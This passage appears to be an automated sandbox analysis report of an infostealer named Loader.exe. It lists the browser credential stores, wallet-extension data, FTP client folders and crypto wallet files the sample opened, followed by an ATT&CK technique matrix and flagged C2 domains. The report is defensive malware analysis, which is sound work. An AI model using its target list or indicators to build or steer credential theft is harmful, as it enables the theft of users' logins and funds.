                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2338745992.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2352050415.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2375611870.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2375179400.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2390068678.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 6472, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 6472, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object Model3
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Loader.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://fancywaxxers.shop:443/apiMicrosoft100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api$100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiSd100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiNh100%Avira URL Cloudmalware
                https://fancywaxxers.shop/kqu100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api_yU100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api1-2100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiMECn100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/api.100%Avira URL Cloudmalware
                https://fancywaxxers.shop/sl100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api-100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                fancywaxxers.shop
                104.21.80.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      fancywaxxers.shopfalse
                        high
                        cloudewahsj.shopfalse
                          high
                          noisycuttej.shopfalse
                            high
                            nearycrepso.shopfalse
                              high
                              https://fancywaxxers.shop/apifalse
                                high
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabLoader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://fancywaxxers.shop/api$Loader.exe, 00000003.00000003.2638750413.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2638726873.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2638570560.0000000002D3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://fancywaxxers.shop/apiSdLoader.exe, 00000003.00000003.2375109855.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374823477.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374273445.00000000054C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiLoader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://fancywaxxers.shop:443/apiMicrosoftLoader.exe, 00000003.00000002.3277198269.0000000002CC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://fancywaxxers.shop/apiNhLoader.exe, 00000003.00000003.2389754813.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaLoader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://fancywaxxers.shop/api1-2Loader.exe, 00000003.00000003.2375109855.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374823477.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374273445.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2389970754.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2390049990.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2389754813.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://fancywaxxers.shop/api_yULoader.exe, 00000003.00000003.2352050415.0000000002D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://fancywaxxers.shop/apiMECnLoader.exe, 00000003.00000003.2389970754.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2390049990.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2389754813.00000000054C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgLoader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://fancywaxxers.shop/kquLoader.exe, 00000003.00000003.2415851140.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2416587052.0000000002D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://fancywaxxers.shop/slLoader.exe, 00000003.00000003.2390068678.0000000002CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://fancywaxxers.shop:443/api.Loader.exe, 00000003.00000003.2337035887.0000000002CC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLoader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.c.lencr.org/0Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
